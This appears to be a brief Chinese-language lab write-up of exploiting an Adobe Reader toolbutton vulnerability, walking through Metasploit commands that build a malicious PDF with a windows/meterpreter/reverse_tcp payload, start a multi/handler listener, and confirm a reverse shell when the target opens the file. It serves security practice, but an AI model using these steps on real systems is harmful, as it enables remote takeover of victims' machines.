漏洞简介
- 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。
实践过程
- 输入命令
use exploit/windows/fileformat/adobe_toolbutton使用该模块,然后使用set payload windows/meterpreter/reverse_tcp设置回连,show options检查设置信息并补全,最后exploit生成文件,文件在显示的目录下:
- 建立监听
use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,然后exploit开启监听,同时在靶机点开pdf:
- 可以看到回连成功